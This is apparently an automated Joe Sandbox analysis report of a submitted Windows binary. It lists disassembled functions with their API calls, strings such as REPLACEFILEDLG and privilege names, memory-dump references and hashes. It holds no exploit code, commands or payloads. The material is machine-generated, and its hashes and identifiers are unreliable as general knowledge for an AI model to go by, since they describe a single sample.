GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0037C3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0037C3D4
_swprintf.LIBCMT ref: 0037C404

Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0037C417
FindClose.KERNEL32(00000000), ref: 0037C41E
_swprintf.LIBCMT ref: 0037C477
SetDlgItemTextW.USER32(?,00000068,?), ref: 0037C48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0037C4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0037C4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 0037C4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0037C4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0037C509
_swprintf.LIBCMT ref: 0037C535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0037C548
_swprintf.LIBCMT ref: 0037C59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0037C5AF

Part of subcall function 0037AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0037AF35
Part of subcall function 0037AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0039E72C,?,?), ref: 0037AF84

Strings

P7, xrefs: 0037C342
REPLACEFILEDLG, xrefs: 0037C247
%s %s, xrefs: 0037C469, 0037C58E
%s %s %s, xrefs: 0037C3F2, 0037C527

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$P7$REPLACEFILEDLG
API String ID: 797121971-618955506
Opcode ID: 6d5b8ee397d928986ad875b24cbd10d4163f10c49ba72454c319a594be144017
Instruction ID: f61cd2cb42d4e5ee8e183849cc0644f6a614b6b7b071b11c346723ea2d26d3d0
Opcode Fuzzy Hash: 6d5b8ee397d928986ad875b24cbd10d4163f10c49ba72454c319a594be144017
Instruction Fuzzy Hash: 2C919672148348BFD633EBA4CC49FFB77ACEB4A704F048819F649D6091D775AA048B62

Function 00366FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00366FAA
_wcslen.LIBCMT ref: 00367013
_wcslen.LIBCMT ref: 00367084

Part of subcall function 00367A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00367AAB
Part of subcall function 00367A9C: GetLastError.KERNEL32 ref: 00367AF1
Part of subcall function 00367A9C: CloseHandle.KERNEL32(?), ref: 00367B00

Part of subcall function 0036A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0036977F,?,?,003695CF,?,?,?,?,?,00392641,000000FF), ref: 0036A1F1
Part of subcall function 0036A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0036977F,?,?,003695CF,?,?,?,?,?,00392641), ref: 0036A21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00367139
CloseHandle.KERNEL32(00000000), ref: 00367155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00367298

Part of subcall function 00369DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,003673BC,?,?,?,00000000), ref: 00369DBC
Part of subcall function 00369DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00369E70

Part of subcall function 00369620: CloseHandle.KERNELBASE(000000FF,?,?,003695D6,?,?,?,?,?,00392641,000000FF), ref: 0036963B

Part of subcall function 0036A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A501
Part of subcall function 0036A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A532

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00366FCC
\??\, xrefs: 0036702B
UNC\, xrefs: 00367051
SeRestorePrivilege, xrefs: 00366FC2

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: a6ad64c0f42aa0ae10ab8193e132a830dfff1a952b074925056b43b2ca8e276f
Instruction ID: 6f499d96adb8e1d1ff0ad073340ff1cd7a2e49af8aea03cf4381ae7f151d15dd
Opcode Fuzzy Hash: a6ad64c0f42aa0ae10ab8193e132a830dfff1a952b074925056b43b2ca8e276f
Instruction Fuzzy Hash: 5EC109B5D04604AADB23DB74CC42FEFB3ACAF04304F40855AF956EB286D734AA44CB61

Function 0038D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0038DA34

Strings

1#SNAN, xrefs: 0038EC33
1#IND, xrefs: 0038EC2C
1#QNAN, xrefs: 0038EC3A
1#INF, xrefs: 0038EC41

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 5caf1bc099ac0b56d847e48cdf6fb9555c41d881e081f4183cf9d43f9e329ebe
Instruction ID: 127c8040975b9f16711afbff47ad6874f6ea9d25a5383164c9377365a7a7797d
Opcode Fuzzy Hash: 5caf1bc099ac0b56d847e48cdf6fb9555c41d881e081f4183cf9d43f9e329ebe
Instruction Fuzzy Hash: 1BC23E71E046288FDB66EF28DD407E9B7B9EB84305F1541EAD44DE7280E775AE818F40

Function 003632F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00363300
_swprintf.LIBCMT ref: 003636C7

Strings

hc%u, xrefs: 0036370A
CMT, xrefs: 00363A17
h%u, xrefs: 003636BC

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: 0dabb1f77bc50d8c08af230b0a68d8889c8371cf84971fdc47f4525719be2699
Instruction ID: bb0a140c8574d68a9bfe5ab402b53c63367ee23ed4ce000f91a3d293616e21c3
Opcode Fuzzy Hash: 0dabb1f77bc50d8c08af230b0a68d8889c8371cf84971fdc47f4525719be2699
Instruction Fuzzy Hash: AB32D6715143849FDF16DF74C895AEA3BA5AF15300F08847DFD8A8F28ADB749A49CB20

Function 0036286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00362874
_strlen.LIBCMT ref: 00362E3F

Part of subcall function 003702BA: __EH_prolog.LIBCMT ref: 003702BF

Part of subcall function 00371B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0036BAE9,00000000,?,?,?,00010474), ref: 00371BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00362F91

Strings

CMT, xrefs: 00362FBC

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: 234f2cc8a8809684306c40af38ff8f9b87da435e14b2703cdd8b9863459b3f4a
Instruction ID: d5c001998c3061f9b24ddc0f996a5fc3f251ec19454517dfdaeeafc81a8a52ab
Opcode Fuzzy Hash: 234f2cc8a8809684306c40af38ff8f9b87da435e14b2703cdd8b9863459b3f4a
Instruction Fuzzy Hash: 9B6227715006448FDB1ADF38C8966FA3BA1EF55300F09C47EEC9A8F28ADB759945CB60

Function 0037F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0037F844
IsDebuggerPresent.KERNEL32 ref: 0037F910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0037F930
UnhandledExceptionFilter.KERNEL32(?), ref: 0037F93A

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 6a308b0ac098624afcdfd044da487debd3fb0f3bace67edc213ce3488a8362c3
Instruction ID: b24af11cee9d846d08aeeae125d6f8bcb34ebc56a5e067c578b1de17f0012201
Opcode Fuzzy Hash: 6a308b0ac098624afcdfd044da487debd3fb0f3bace67edc213ce3488a8362c3
Instruction Fuzzy Hash: 31311AB5D05219DFDB21EFA4D9897CDBBB8BF04304F1040AAE50CAB250EB759B848F45

Function 0037E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,0037E5E8,0000001C,0037E7DD,00000000,?,?,?,?,?,?,?,0037E5E8,00000004,003C1CEC,0037E86D), ref: 0037E6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0037E5E8,00000004,003C1CEC,0037E86D), ref: 0037E6CF

Strings

D, xrefs: 0037E6C3

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 6ed878d60b388919a502a8f4ac07d877adadd373acafe6b7175f82531e6fbafb
Instruction ID: 2b8fb05748abead62fe0d416e77b48996d2d1be235aecf1756d1a7c6145b4b72
Opcode Fuzzy Hash: 6ed878d60b388919a502a8f4ac07d877adadd373acafe6b7175f82531e6fbafb
Instruction Fuzzy Hash: DA01F77260010D6BDB24DE29DC09BDD7BAAAFC8329F0DC161ED1DD7154D638D9058680

Function 00388EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00388FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00388FBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00388FCC

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 66d6714bdccf70de9963b125615f882985497ed93a6fcd5142ba76a285921a40
Instruction ID: 040a6fe47325f5c364534f76c2c2bc3ebffdbd0dfc27cc14ec06d586a77e5c40
Opcode Fuzzy Hash: 66d6714bdccf70de9963b125615f882985497ed93a6fcd5142ba76a285921a40
Instruction Fuzzy Hash: CF31C8759013189BCB22DF64DC8979DBBB8BF08310F5041EAE41CA7250EB759F858F44

Function 0038D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: 6cfbd4251c47ee5fbd4f20dcd2e9f0ca8d9a5e4de5d63df66b5748d927bf6c80
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: 99021C71E002199FDF15DFA9D8806ADB7F1EF48314F2581AAE919EB384D731AD418B90

Function 0037AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0037AF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,0039E72C,?,?), ref: 0037AF84

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 93c7a477ad51ec3486f4c689353bc1f8cc2b71528e55440a55025c340598d432
Instruction ID: 78598a27b9ceafb58ce985fa673382e465eb1b2023a26af5459a2cce98db0376
Opcode Fuzzy Hash: 93c7a477ad51ec3486f4c689353bc1f8cc2b71528e55440a55025c340598d432
Instruction Fuzzy Hash: DA01717A140308AEDB12DFA4EC45F9A77BCEF08714F009022FB0597161D3709955CBA5

Function 00366C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00366DDF,00000000,00000400), ref: 00366C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00366C95

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 1ac342a1041ee9e54f965cf7aa5042beea3c3f2cbdbaa9ae51da631a984920ab
Instruction ID: 03283c36bf37d9575419021758afd39c49ad9d3911834df43911fdf883e8c573
Opcode Fuzzy Hash: 1ac342a1041ee9e54f965cf7aa5042beea3c3f2cbdbaa9ae51da631a984920ab
Instruction Fuzzy Hash: BBD0C971344300BFFA120B628D07F6A7B9DBF45B91F18C405B796E80E0CAB59824E629

Function 003919F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003919EF,?,?,00000008,?,?,0039168F,00000000), ref: 00391C21

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 3283fdd830d173904365d9335fb382139cff537d0f2b35a4bf45603fca56eff1
Instruction ID: 325c1d1a1ea818dc26eda27474ba45dfbc873fb374cb532af60ccecc94643b4d
Opcode Fuzzy Hash: 3283fdd830d173904365d9335fb382139cff537d0f2b35a4bf45603fca56eff1
Instruction Fuzzy Hash: D8B15C3521060A9FDB16CF28C48AB657BE1FF45364F268698E89ADF2A1C335DD91CB40

Function 0037F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0037F66A

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 8c62e40cc93066ae0c2d07b025f3d179857e19ad523e9703f4b969a1eeaf874e
Instruction ID: fd9dc0d7806cd7906a3a9fa1bfffe9e09883ed2ac0b642939ae185f2c9d1cb65
Opcode Fuzzy Hash: 8c62e40cc93066ae0c2d07b025f3d179857e19ad523e9703f4b969a1eeaf874e
Instruction Fuzzy Hash: 565181B1900605CFEB2ACF94D8857AAB7F8FB48354F25853AD409EB251D379ED00CB51

Function 0036B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0036B16B

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 77159750ef7042ea409a16a5fe08df56fb97761f7a5cfd1c7c4ba7cb1b35c5b1
Instruction ID: d0c2502b561adab96f36d38a5d89da72d4ca0b7aa0635bf75f4bc2e0e0a09324
Opcode Fuzzy Hash: 77159750ef7042ea409a16a5fe08df56fb97761f7a5cfd1c7c4ba7cb1b35c5b1
Instruction Fuzzy Hash: FFF03AB4E00218DFDB1ACB18EC926DA73F9FB8A315F114296D91693390C3B0A9C48E60

Function 003640FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

gj, xrefs: 003641BC

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 1c0119179a0c39568eedd5dcd26acf785502266cc17353ed66d5867a59e64076
Instruction ID: b1ae66b1c1048837e7a341d1219d59ea3c84150f310991fbf1baa53e54282874
Opcode Fuzzy Hash: 1c0119179a0c39568eedd5dcd26acf785502266cc17353ed66d5867a59e64076
